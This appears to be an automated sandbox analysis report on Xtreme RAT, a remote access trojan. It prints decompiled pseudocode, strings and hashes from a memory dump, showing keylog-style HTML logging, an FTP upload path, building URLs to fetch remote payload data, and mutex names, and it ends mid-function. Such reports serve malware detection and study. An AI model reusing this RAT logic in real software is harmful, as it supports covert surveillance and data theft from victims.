Uniqueness

Uniqueness Score: -1.00%

Function 10005A94, Relevance: 12.6, Strings: 10, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E10005A94(char __eax, void* __ebx, void* __ecx) {
				char _v8;
				intOrPtr _t52;
				intOrPtr _t64;

				_v8 = __eax;
				E10003C28( &_v8);
				_push(_t64);
				_push(0x10005b87);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				E10003A34(_v8, L"HKEY_CLASSES_ROOT");
				if(0 != 0) {
					E10003A34(_v8, L"HKCR");
					if(0 != 0) {
						E10003A34(_v8, L"HKEY_CURRENT_USER");
						if(__eflags == 0) {
							L5:
						} else {
							E10003A34(_v8, L"HKCU");
							if(__eflags != 0) {
								E10003A34(_v8, L"HKEY_LOCAL_MACHINE");
								if(__eflags == 0) {
									L8:
								} else {
									E10003A34(_v8, L"HKLM");
									if(__eflags != 0) {
										E10003A34(_v8, L"HKEY_USERS");
										if(__eflags == 0) {
											L11:
										} else {
											E10003A34(_v8, 0x10005c60);
											if(__eflags != 0) {
												E10003A34(_v8, L"HKEY_CURRENT_CONFIG");
												if(__eflags == 0) {
													L14:
												} else {
													E10003A34(_v8, L"HKCC");
													if(__eflags == 0) {
														goto L14;
													}
												}
											} else {
												goto L11;
											}
										}
									} else {
										goto L8;
									}
								}
							} else {
								goto L5;
							}
						}
					} else {
						goto L2;
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E10005B8E);
				return E10003770( &_v8);
			}

Strings

HKLM, xrefs: 10005B16
HKEY_CLASSES_ROOT, xrefs: 10005ABA
HKU, xrefs: 10005B3B
HKCR, xrefs: 10005AC9
HKEY_CURRENT_CONFIG, xrefs: 10005B51
HKEY_CURRENT_USER, xrefs: 10005AE2
HKEY_USERS, xrefs: 10005B2C
HKCU, xrefs: 10005AF1
HKCC, xrefs: 10005B60
HKEY_LOCAL_MACHINE, xrefs: 10005B07

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 0-909552448
Opcode ID: 19a7d89fdd0d4a8943666261cc10e3fb7835feb1d7da3395f8e32f4d42fefbdb
Instruction ID: 07abd4759daa604870a4f77bd8534178fed91fd4fee8f89ff290bb29f67fd9b2
Opcode Fuzzy Hash: 19a7d89fdd0d4a8943666261cc10e3fb7835feb1d7da3395f8e32f4d42fefbdb
Instruction Fuzzy Hash: E5211D38B041C99BF711DA99858295FB3E9DB8D7C2FB08091B8415731EDB37BF019622

Uniqueness

Uniqueness Score: -1.00%

Function 1000A558, Relevance: 9.0, Strings: 7, Instructions: 279
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E1000A558(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr* _v12;
				char _v13;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v2520;
				intOrPtr _v2524;
				char _v4964;
				void _v5044;
				char _v5048;
				char _v5052;
				char _v5056;
				intOrPtr _v5060;
				char _v5064;
				char _v5068;
				char _v5072;
				char _v5076;
				char _v5080;
				char _v5084;
				char _v5088;
				void* _t113;
				void* _t152;
				void* _t156;
				intOrPtr _t166;
				void* _t186;
				void* _t191;
				void* _t213;
				void* _t225;
				char* _t226;
				intOrPtr _t228;
				intOrPtr* _t232;
				char _t246;
				intOrPtr _t249;
				void* _t259;
				char* _t260;
				char _t273;
				void* _t274;
				char* _t275;
				intOrPtr _t291;
				void* _t293;
				intOrPtr* _t294;
				void* _t296;
				void* _t297;

				_t246 = __edx;
				_t296 = _t297;
				_t228 = 0x27b;
				do {
					_push(0);
					_push(0);
					_t228 = _t228 - 1;
				} while (_t228 != 0);
				_t1 =  &_v8;
				 *_t1 = _t228;
				_push(__ebx);
				_t293 = __eax;
				_push( *_t1);
				memcpy( &_v5044, __eax, 0x4e4 << 2);
				_pop(_t232);
				_v12 = _t232;
				_v8 = _t246;
				E10003C28( &_v8);
				_push(_t296);
				_push(0x1000a98b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t297 + 0xc;
				E10003770(_v12);
				_push("URLMON.DLL");
				L10004EE8();
				_push("shell32.dll");
				L10004EE8();
				E100037D0( &_v24, L"XTREME");
				_v13 = 0;
				_t225 = E1000390C(_v8);
				_t113 = E10005CA4(_t225);
				_t301 = _t113;
				if(_t113 == 0) {
					L8:
					_t291 = 0x14;
					_t226 =  &_v4964;
					_t294 =  &_v5044;
					do {
						E100034B0( &_v5052, 0x3d, _t226);
						__eflags = _v5052;
						if(_v5052 != 0) {
							__eflags =  *_t294;
							if( *_t294 > 0) {
								_push("http://");
								E100034B0( &_v5064, 0x3d, _t226);
								_push(_v5064);
								_push(0x1000aa2c);
								E100035A0();
								_t255 = _v5060;
								E100038FC( &_v5056, _v5060);
								_push(_v5056);
								asm("cdq");
								E10005CCC( &_v5068, 0x3d, _v5060,  *_t294, _t255);
								_push(_v5068);
								_push(0x1000aa34);
								E10005CCC( &_v5072, 0x3d, _t255, _v2524, _v2520);
								_push(_v5072);
								_push(L".functions");
								E100039EC();
								E10003898( &_v5076, E1000390C(_v8));
								_push(_v5076);
								E10003898( &_v5080, E1000390C(_v20));
								_pop(_t259);
								_t152 = E10005F88(_v5080, _t226, _t259);
								__eflags = _t152 - 1;
								if(_t152 != 1) {
									_push(E1000390C(_v8));
									L10004E30();
								} else {
									_t156 = E1000390C(_v8);
									_t260 =  &_v28;
									_v36 = E10005E30(_t156, _t260);
									_v32 = _t260;
									__eflags = _v32;
									if(__eflags != 0) {
										if(__eflags > 0) {
											goto L16;
										}
									} else {
										__eflags = _v36;
										if(_v36 > 0) {
											L16:
											E10003BE4( &_v20, E10003FD4(_v36, _v32, 2, 0));
											E100050D0(E1000390C(_v20), _v28);
											_t166 = E10003B94(L"STARTSERVERBUFFER", _v20);
											__eflags = _t166;
											if(_t166 > 0) {
												__eflags = E10003B94(L"ENDSERVERBUFFER", _v20);
												if(__eflags > 0) {
													E10003B04( &_v20, 0x11, 1, __eflags);
													E10003B04( &_v20, 0xf, E1000391C(_v20) - 0xf, __eflags);
													E10006234(_v20, _t226,  &_v5084, _v24, _t294, __eflags);
													E100037AC(_v12, _v5084);
													_push(L"STARTSERVERBUFFER");
													_push( *_v12);
													_push(L"ENDSERVERBUFFER");
													E100039EC();
													E10006234(_v20, _t226,  &_v5088, _v24, _t294, __eflags);
													_t273 = _v5088;
													E100037D0( &_v20, _t273);
													_t186 = E1000391C(_v20);
													asm("cdq");
													_push(_t273);
													_push(_t186 + _t186);
													_push(E1000390C(_v20));
													_t191 = E1000390C(_v8);
													_pop(_t274);
													E10005EB4(_t191, _t274);
													E10005F1C(_v8, _t226,  &_v5088, _t294);
													_v13 = 1;
												}
											}
										}
									}
								}
							}
						}
						_t294 = _t294 + 4;
						_t226 = _t226 + 0x7a;
						_t291 = _t291 - 1;
						__eflags = _t291;
					} while (_t291 != 0);
				} else {
					_push(0x80);
					_push(_t225);
					L10004F30();
					_t275 =  &_v28;
					_v36 = E10005E30(_t225, _t275);
					_v32 = _t275;
					E10003BE4( &_v20, E10003FD4(_v36, _v32, 2, 0));
					E100050D0(E1000390C(_v20), _v28);
					E10006234(_v20, _t225,  &_v5048, _v24, _t293, _t301);
					E100037D0( &_v20, _v5048);
					if(E10003B94(L"STARTSERVERBUFFER", _v20) <= 0) {
						L7:
						_push(E1000390C(_v8));
						L10004E30();
						goto L8;
					} else {
						_t213 = E10003B94(L"ENDSERVERBUFFER", _v20);
						_t303 = _t213;
						if(_t213 <= 0) {
							goto L7;
						} else {
							E10005F1C(_v8, _t225,  &_v5048, _t293);
							E10003B04( &_v20, 0x11, 1, _t303);
							E10003B04( &_v20, 0xf, E1000391C(_v20) - 0xf, _t303);
							E100037AC(_v12, _v20);
							_v13 = 1;
						}
					}
				}
				_pop(_t249);
				 *[fs:eax] = _t249;
				_push(E1000A992);
				E10003788( &_v5088, 6);
				E100032F0( &_v5064, 2);
				E10003770( &_v5056);
				E100032CC( &_v5052);
				E10003770( &_v5048);
				E10003788( &_v24, 2);
				return E10003770( &_v8);
			}

0x1000a558
0x1000a559
0x1000a55c
0x1000a561
0x1000a561
0x1000a563
0x1000a565
0x1000a565
0x1000a568
0x1000a568
0x1000a56b
0x1000a56e
0x1000a576
0x1000a57c
0x1000a57e
0x1000a57f
0x1000a582
0x1000a588
0x1000a58f
0x1000a590
0x1000a595
0x1000a598
0x1000a59e
0x1000a5a3
0x1000a5a8
0x1000a5ad
0x1000a5b2
0x1000a5bf
0x1000a5c4
0x1000a5d0
0x1000a5d4
0x1000a5d9
0x1000a5db
0x1000a6bf
0x1000a6bf
0x1000a6c4
0x1000a6ca
0x1000a6d0
0x1000a6dd
0x1000a6e2
0x1000a6e9
0x1000a6ef
0x1000a6f2
0x1000a6f8
0x1000a70a
0x1000a70f
0x1000a715
0x1000a725
0x1000a72a
0x1000a736
0x1000a73b
0x1000a743
0x1000a74c
0x1000a751
0x1000a757
0x1000a76e
0x1000a773
0x1000a779
0x1000a786
0x1000a79b
0x1000a7a6
0x1000a7b7
0x1000a7c2
0x1000a7c3
0x1000a7c8
0x1000a7ca
0x1000a914
0x1000a915
0x1000a7d0
0x1000a7d3
0x1000a7d8
0x1000a7e0
0x1000a7e3
0x1000a7e6
0x1000a7ea
0x1000a7f8
0x00000000
0x00000000
0x1000a7ec
0x1000a7ec
0x1000a7f0
0x1000a7fe
0x1000a812
0x1000a825
0x1000a832
0x1000a837
0x1000a839
0x1000a84c
0x1000a84e
0x1000a861
0x1000a87b
0x1000a88c
0x1000a89a
0x1000a89f
0x1000a8a7
0x1000a8a9
0x1000a8b6
0x1000a8c7
0x1000a8cc
0x1000a8d5
0x1000a8dd
0x1000a8e4
0x1000a8e5
0x1000a8e6
0x1000a8ef
0x1000a8f3
0x1000a8f8
0x1000a8f9
0x1000a901
0x1000a906
0x1000a906
0x1000a84e
0x1000a839
0x1000a7f0
0x1000a7ea
0x1000a7ca
0x1000a6f2
0x1000a91a
0x1000a91d
0x1000a920
0x1000a920
0x1000a920
0x1000a5e1
0x1000a5e1
0x1000a5e6
0x1000a5e7
0x1000a5ee
0x1000a5f6
0x1000a5f9
0x1000a610
0x1000a623
0x1000a634
0x1000a642
0x1000a656
0x1000a6b1
0x1000a6b9
0x1000a6ba
0x00000000
0x1000a658
0x1000a660
0x1000a665
0x1000a667
0x00000000
0x1000a669
0x1000a66c
0x1000a67e
0x1000a698
0x1000a6a3
0x1000a6a8
0x1000a6a8
0x1000a667
0x1000a656
0x1000a929
0x1000a92c
0x1000a92f
0x1000a93f
0x1000a94f
0x1000a95a
0x1000a965
0x1000a970
0x1000a97d
0x1000a98a

Strings

XTREME, xrefs: 1000A5BA
shell32.dll, xrefs: 1000A5AD
STARTSERVERBUFFER, xrefs: 1000A64A, 1000A82D, 1000A89F
URLMON.DLL, xrefs: 1000A5A3
ENDSERVERBUFFER, xrefs: 1000A65B, 1000A842, 1000A8A9
http://, xrefs: 1000A6F8
.functions, xrefs: 1000A779

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: .functions$ENDSERVERBUFFER$STARTSERVERBUFFER$URLMON.DLL$XTREME$http://$shell32.dll
API String ID: 0-4263465085
Opcode ID: 470b965d5662e412d8179e10860a8eacdfdba3da0a7e451b88e4202af90a0bea
Instruction ID: 095f8cd7e1ad7f54d17a8aaba90678f4abf6843293fa25502bb1c2560b129c41
Opcode Fuzzy Hash: 470b965d5662e412d8179e10860a8eacdfdba3da0a7e451b88e4202af90a0bea
Instruction Fuzzy Hash: 3FB14D78A001199BEB11DBA4CC82ADFB7B9FF44380F5081A5F504A765ADB74AF858F50

Uniqueness

Uniqueness Score: -1.00%

Function 10008DA4, Relevance: 7.7, Strings: 6, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E10008DA4(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v37;
				char _v38;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _t58;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				void* _t86;
				intOrPtr _t105;
				char* _t112;
				intOrPtr _t119;
				intOrPtr _t122;
				intOrPtr _t125;
				intOrPtr _t126;
				intOrPtr _t131;
				void* _t135;
				void* _t137;
				void* _t140;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v12 = 0;
				_t137 = __ecx;
				_v8 = __edx;
				_t135 = __eax;
				_push(_t140);
				_push(0x1000907b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140 + 0xffffffd0;
				if( *0x1000e0b8 != 0xffffffff) {
					_v36 = 0;
					_v32 = 0;
					_push(0);
					_t58 =  *0x1000e0b8; // 0x0
					_push(_t58);
					L10004E80();
					_v20 = _t58;
					_v16 = 0;
					if(_v16 != 0) {
						if(__eflags > 0) {
							goto L5;
						}
					} else {
						if(_v20 > 0) {
							L5:
							_v36 = _v20;
							_v32 = _v16;
						}
					}
					if(_v32 != 0) {
						if(__eflags > 0) {
							goto L10;
						}
					} else {
						if(_v36 > 0) {
							L10:
							 *0x1000f6c4 = E10006788(0, _t135, _t137, __eflags);
							 *0x1000f6c8 = 0;
							_t60 =  *0x1000f6c4; // 0x0
							_t125 =  *0x1000f6c8; // 0x0
							__eflags = _t125 - _v32;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									goto L15;
								} else {
									goto L14;
								}
							} else {
								__eflags = _t60 - _v36;
								if(_t60 <= _v36) {
									L15:
									_t61 =  *0x1000f6c4; // 0x0
									_t126 =  *0x1000f6c8; // 0x0
									__eflags = _t126 - _v32;
									if(_t126 != _v32) {
										goto L17;
									} else {
										__eflags = _t61 - _v36;
										if(_t61 != _v36) {
											goto L17;
										}
									}
								} else {
									L14:
									 *0x1000f6c4 = 0;
									 *0x1000f6c8 = 0;
									L17:
									__eflags =  *0x1000f688;
									if( *0x1000f688 != 0) {
										_push(0);
										_push(0);
										_t62 =  *0x1000f694; // 0xc1bc
										_push(_t62);
										_t63 =  *0x1000f688; // 0x0
										_push(E1000662C(_t63));
										L10005088();
										_push(0);
										_push(0);
										_t65 =  *0x1000f6c4; // 0x0
										_push(_t65);
										_t66 =  *0x1000e0b8; // 0x0
										_push(_t66);
										L10004F38();
										asm("sbb edx, [0x1000f6c8]");
										E10003BE4( &_v12, E10003FD4(_v36 -  *0x1000f6c4, _v32, 2, 0));
										_push(0);
										_push( &_v24);
										_push(_v36 -  *0x1000f6c4);
										_push(_v12);
										_t76 =  *0x1000e0b8; // 0x0
										_push(_t76);
										L10004F00();
										_push(2);
										_push(0);
										_push(0);
										_t77 =  *0x1000e0b8; // 0x0
										_push(_t77);
										L10004F38();
										_push(0);
										_push(0);
										_t78 =  *0x1000f698; // 0x0
										_push(_t78);
										_t79 =  *0x1000f688; // 0x0
										_push(E1000662C(_t79));
										L10005088();
										_push(L"<html>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html;charset=UTF-8\">\r\n<head>\r\n<title>Xtreme RAT</title>\r\n</head>\r\n<body>");
										_push(_v12);
										_push(L"</body>");
										_push(0x100091ac);
										_push(L"</html>");
										E100039EC();
										_push(0x80);
										_push(_t137);
										L10004F30();
										_push(_t137);
										L10004E30();
										_push(0);
										_push(0);
										_push(2);
										_push(0);
										_push(0);
										_push(0x40000000);
										_push(_t137);
										L10004DE0();
										_t112 =  &_v12;
										__eflags = _t112 - 0xffffffff;
										if(_t112 != 0xffffffff) {
											_v38 = 0xff;
											_v37 = 0xfe;
											_push(0);
											_push( &_v24);
											_push(2);
											_push( &_v38);
											_push(_t112);
											L10004FA0();
											_push(0);
											_push( &_v24);
											_t105 = E1000391C(_v12) + _t104;
											__eflags = _t105;
											_push(_t105);
											_push(_v12);
											_push(_t112);
											L10004FA0();
										}
										_push(_t112);
										L10004DC0();
										_t117 = _t137;
										_t130 = _v8;
										_t86 = E100068EC(_t135, _t137, _v8, _a4, _a8, _a12);
										_t113 = _t86;
										__eflags = _t86 - 1;
										if(__eflags == 0) {
											 *0x1000f6c4 = _v36;
											 *0x1000f6c8 = _v32;
											E10006710( &_v44, _t117, _t130,  *0x1000f6c4,  *0x1000f6c8);
											_t119 =  *0x1000f6b4; // 0x0
											E10003988( &_v48, _t119, L"SOFTWARE\\", __eflags);
											E1000577C(0x80000001, _t113, L"LastSize", _v48, _t137, __eflags, 2, _v44);
										}
										_t131 =  *0x1000f684; // 0x0
										E10003988( &_v52, 0x100091fc, _t131, __eflags);
										_push(E1000390C(_v52));
										L10004E30();
									}
								}
							}
						} else {
						}
					}
				}
				_pop(_t122);
				 *[fs:eax] = _t122;
				_push(E10009082);
				E10003788( &_v52, 3);
				return E10003770( &_v12);
			}

0x10008daa
0x10008dab
0x10008dac
0x10008daf
0x10008db2
0x10008db5
0x10008db8
0x10008dbb
0x10008dbd
0x10008dc0
0x10008dc4
0x10008dc5
0x10008dca
0x10008dcd
0x10008dd9
0x10008ddf
0x10008de6
0x10008ded
0x10008def
0x10008df4
0x10008df5
0x10008dfc
0x10008dff
0x10008e06
0x10008e10
0x00000000
0x00000000
0x10008e08
0x10008e0c
0x10008e12
0x10008e15
0x10008e1b
0x10008e1b
0x10008e0c
0x10008e22
0x10008e2f
0x00000000
0x00000000
0x10008e24
0x10008e28
0x10008e35
0x10008e3a
0x10008e40
0x10008e46
0x10008e4c
0x10008e52
0x10008e55
0x10008e5e
0x00000000
0x00000000
0x00000000
0x00000000
0x10008e57
0x10008e57
0x10008e5a
0x10008e76
0x10008e76
0x10008e7c
0x10008e82
0x10008e85
0x00000000
0x10008e87
0x10008e87
0x10008e8a
0x00000000
0x00000000
0x10008e8a
0x10008e5c
0x10008e60
0x10008e60
0x10008e6a
0x10008e90
0x10008e90
0x10008e97
0x10008e9d
0x10008e9f
0x10008ea1
0x10008ea6
0x10008ea7
0x10008eb1
0x10008eb2
0x10008eb7
0x10008eb9
0x10008ebb
0x10008ec0
0x10008ec1
0x10008ec6
0x10008ec7
0x10008edc
0x10008eec
0x10008ef1
0x10008ef6
0x10008f00
0x10008f04
0x10008f05
0x10008f0a
0x10008f0b
0x10008f10
0x10008f12
0x10008f14
0x10008f16
0x10008f1b
0x10008f1c
0x10008f21
0x10008f23
0x10008f25
0x10008f2a
0x10008f2b
0x10008f35
0x10008f36
0x10008f3b
0x10008f40
0x10008f43
0x10008f48
0x10008f4d
0x10008f5a
0x10008f5f
0x10008f64
0x10008f65
0x10008f6a
0x10008f6b
0x10008f70
0x10008f72
0x10008f74
0x10008f76
0x10008f78
0x10008f7a
0x10008f7f
0x10008f80
0x10008f85
0x10008f87
0x10008f8a
0x10008f8c
0x10008f90
0x10008f94
0x10008f99
0x10008f9a
0x10008f9f
0x10008fa0
0x10008fa1
0x10008fa6
0x10008fab
0x10008fb4
0x10008fb4
0x10008fb6
0x10008fba
0x10008fbb
0x10008fbc
0x10008fbc
0x10008fc1
0x10008fc2
0x10008fd3
0x10008fd5
0x10008fda
0x10008fdf
0x10008fe1
0x10008fe4
0x10008fe9
0x10008ff2
0x10009007
0x10009015
0x10009020
0x10009032
0x10009032
0x1000903f
0x10009045
0x10009052
0x10009053
0x10009053
0x10008e97
0x10008e5a
0x00000000
0x10008e2a
0x10008e28
0x10008e22
0x1000905a
0x1000905d
0x10009060
0x1000906d
0x1000907a

Strings

LastSize, xrefs: 10009028
</html>, xrefs: 10008F4D
SOFTWARE\, xrefs: 1000901B
FTP, xrefs: 1000903A
<html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>, xrefs: 10008F3B
</body>, xrefs: 10008F43

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: </body>$</html>$<html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>$FTP$LastSize$SOFTWARE\
API String ID: 0-265700797
Opcode ID: 70478f3f3047d89982752d3640f3cec2226bc33a26c5257581dd13bee4673461
Instruction ID: 9ae569672a167bc613e47318ba2929e521b2e386b238916fb1c1f90ba9e27590
Opcode Fuzzy Hash: 70478f3f3047d89982752d3640f3cec2226bc33a26c5257581dd13bee4673461
Instruction Fuzzy Hash: 2C814D74A00259AFFB10DFA8CC85FEE77F9FB08380F508119F544A72A9CB75A9458B64

Uniqueness

Uniqueness Score: -1.00%

Function 100096F6, Relevance: 7.5, Strings: 6, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E100096F6() {
				intOrPtr _t5;
				intOrPtr _t8;

				_push(_t8);
				_push(0x1000977a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t8;
				 *0x1000f6cc =  *0x1000f6cc - 1;
				if( *0x1000f6cc < 0) {
					_push(L"jiejwogfdjieovevodnvfnievn");
					L10005080();
					 *0x1000f68c = 0;
					_push(L"gsegtsrgrefsfsfsgrsgrt");
					L10005080();
					 *0x1000f690 = 0;
					_push(L"trhgtehgfsgrfgtrwegtre");
					L10005080();
					 *0x1000f694 = 0;
					_push(L"jytjyegrsfvfbgfsdf");
					L10005080();
					 *0x1000f694 = 0;
					_push(L"hgtrfsgfrsgfgregtregtr");
					L10005080();
					 *0x1000f69c = 0;
					_push(L"frgjbfdkbnfsdjbvofsjfrfre");
					L10005080();
					 *0x1000f6a0 = 0;
				}
				_pop(_t5);
				 *[fs:eax] = _t5;
				_push(E10009781);
				return 0;
			}

0x100096fd
0x100096fe
0x10009703
0x10009706
0x10009709
0x10009710
0x10009712
0x10009717
0x1000971c
0x10009721
0x10009726
0x1000972b
0x10009730
0x10009735
0x1000973a
0x1000973f
0x10009744
0x10009749
0x1000974e
0x10009753
0x10009758
0x1000975d
0x10009762
0x10009767
0x10009767
0x1000976e
0x10009771
0x10009774
0x00000000

Strings

frgjbfdkbnfsdjbvofsjfrfre, xrefs: 1000975D
gsegtsrgrefsfsfsgrsgrt, xrefs: 10009721
jytjyegrsfvfbgfsdf, xrefs: 1000973F
hgtrfsgfrsgfgregtregtr, xrefs: 1000974E
trhgtehgfsgrfgtrwegtre, xrefs: 10009730
jiejwogfdjieovevodnvfnievn, xrefs: 10009712

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: frgjbfdkbnfsdjbvofsjfrfre$gsegtsrgrefsfsfsgrsgrt$hgtrfsgfrsgfgregtregtr$jiejwogfdjieovevodnvfnievn$jytjyegrsfvfbgfsdf$trhgtehgfsgrfgtrwegtre
API String ID: 0-2672052065
Opcode ID: eaca480185e3529857f08a7b99fa4587865511e38ce0a633c86f9ec4ba4854cf
Instruction ID: ed3f77de684bd0d246fe2b552f76a464aac7a3f76a0323551fd1ca8e49655e55
Opcode Fuzzy Hash: eaca480185e3529857f08a7b99fa4587865511e38ce0a633c86f9ec4ba4854cf
Instruction Fuzzy Hash: 8BF0F9794192116EF701DF714C6697B7698E7453C13818529F5C882A3DDF3358059BE1

Uniqueness

Uniqueness Score: -1.00%

Function 100096F8, Relevance: 7.5, Strings: 6, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E100096F8() {
				intOrPtr _t5;
				intOrPtr _t8;

				_push(_t8);
				_push(0x1000977a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t8;
				 *0x1000f6cc =  *0x1000f6cc - 1;
				if( *0x1000f6cc < 0) {
					_push(L"jiejwogfdjieovevodnvfnievn");
					L10005080();
					 *0x1000f68c = 0;
					_push(L"gsegtsrgrefsfsfsgrsgrt");
					L10005080();
					 *0x1000f690 = 0;
					_push(L"trhgtehgfsgrfgtrwegtre");
					L10005080();
					 *0x1000f694 = 0;
					_push(L"jytjyegrsfvfbgfsdf");
					L10005080();
					 *0x1000f694 = 0;
					_push(L"hgtrfsgfrsgfgregtregtr");
					L10005080();
					 *0x1000f69c = 0;
					_push(L"frgjbfdkbnfsdjbvofsjfrfre");
					L10005080();
					 *0x1000f6a0 = 0;
				}
				_pop(_t5);
				 *[fs:eax] = _t5;
				_push(E10009781);
				return 0;
			}

Strings

frgjbfdkbnfsdjbvofsjfrfre, xrefs: 1000975D
gsegtsrgrefsfsfsgrsgrt, xrefs: 10009721
jytjyegrsfvfbgfsdf, xrefs: 1000973F
hgtrfsgfrsgfgregtregtr, xrefs: 1000974E
trhgtehgfsgrfgtrwegtre, xrefs: 10009730
jiejwogfdjieovevodnvfnievn, xrefs: 10009712

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: frgjbfdkbnfsdjbvofsjfrfre$gsegtsrgrefsfsfsgrsgrt$hgtrfsgfrsgfgregtregtr$jiejwogfdjieovevodnvfnievn$jytjyegrsfvfbgfsdf$trhgtehgfsgrfgtrwegtre
API String ID: 0-2672052065
Opcode ID: 0db88cb41446c7a1772992425046f1e51f35a21a88b435333acbf191ec07eeb4
Instruction ID: 4cd3ad10a4a29e5a40757261822789eba1ab52c8d76854998792a07700413263
Opcode Fuzzy Hash: 0db88cb41446c7a1772992425046f1e51f35a21a88b435333acbf191ec07eeb4
Instruction Fuzzy Hash: EDF0F4B94192116EF701DFB18C6A97B7A98E7453C13818529E6C882A3DDF331405ABE2

Uniqueness

Uniqueness Score: -1.00%

Function 1000B78C, Relevance: 6.6, Strings: 5, Instructions: 309
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E1000B78C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v1018;
				void _v5028;
				char _v5580;
				char _v5584;
				char _v5588;
				char _v5592;
				char _v5596;
				char _v5600;
				char _v5604;
				char _v5608;
				char _v5612;
				char _v5616;
				char _v5620;
				char _v5624;
				char _v5628;
				char _v5632;
				char _v5636;
				char _v5640;
				char _v5644;
				char _v5648;
				char _v5652;
				char _v5656;
				char _v5660;
				char _v5664;
				char _v5668;
				char _v5672;
				char _v5676;
				char _v5680;
				char _t138;
				void* _t149;
				char _t157;
				char* _t230;
				void* _t231;
				void* _t245;
				void* _t247;
				void* _t249;
				void* _t251;
				void* _t255;
				void* _t259;
				intOrPtr _t264;
				intOrPtr _t281;
				void* _t282;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t316;

				_t315 = _t316;
				_t231 = 0x2c5;
				goto L1;
				L4:
				E10003A34(_v8, 0);
				if(0 == 0) {
					L29:
					_pop(_t264);
					 *[fs:eax] = _t264;
					_push(E1000BC64);
					E10003788( &_v5680, 0xf);
					E100032F0( &_v5620, 2);
					E10003788( &_v5612, 2);
					E100032F0( &_v5604, 2);
					E10003788( &_v5596, 4);
					return E10003788( &_v16, 3);
				} else {
					while(1) {
						E10003A34(_v8, 0);
						if(0 == 0) {
							goto L29;
						}
						E10003770( &_v16);
						E10003770( &_v12);
						E100050D8();
						E100050D0(_t230, E1000390C(_v8));
						E10003B04( &_v8, 0x228, 1, __eflags);
						E10003AB8(_v8, E10003FD4( *((intOrPtr*)(_t230 + 0x210)),  *((intOrPtr*)(_t230 + 0x214)), 2, 0), 1, __eflags,  &_v16);
						E10003B04( &_v8, E10003FD4( *((intOrPtr*)(_t230 + 0x210)),  *((intOrPtr*)(_t230 + 0x214)), 2, 0), 1, __eflags);
						__eflags =  *((char*)(_t230 + 0x220));
						if( *((char*)(_t230 + 0x220)) != 0) {
							L9:
							_t138 =  *((intOrPtr*)(_t230 + 0x218));
							__eflags = _t138;
							if(_t138 != 0) {
								__eflags = _t138 - 1;
								if(_t138 != 1) {
									__eflags = _t138 - 2;
									if(_t138 != 2) {
										__eflags = _t138 - 3;
										if(_t138 != 3) {
											__eflags = _t138 - 4;
											if(__eflags == 0) {
												E10005638( &_v5656, _t311, _t313);
												__eflags = 0;
												E10003A34(_v5656, 0);
												if(__eflags != 0) {
													E10005638( &_v5660, _t311, _t313);
													_push(_v5660);
													_push(E1000BCA4);
													E100038E0( &_v5664, 0x105, _t230);
													_push(_v5664);
													E100039EC();
												}
											}
										} else {
											E100038E0( &_v5648, 0x105, _t230);
											_push(_v5648);
											E10005324( &_v5652);
											_pop(_t245);
											E10003988( &_v12, _t245, _v5652, __eflags);
										}
									} else {
										E100038E0( &_v5640, 0x105, _t230);
										_push(_v5640);
										E10005460( &_v5644, _t230, 0x105, __eflags);
										_pop(_t247);
										E10003988( &_v12, _t247, _v5644, __eflags);
									}
								} else {
									E100038E0( &_v5632, 0x105, _t230);
									_push(_v5632);
									E100053D8( &_v5636, _t230, __eflags);
									_pop(_t249);
									E10003988( &_v12, _t249, _v5636, __eflags);
								}
							} else {
								E100038E0( &_v5624, 0x105, _t230);
								_push(_v5624);
								E10005350( &_v5628, _t230, __eflags);
								_pop(_t251);
								E10003988( &_v12, _t251, _v5628, __eflags);
							}
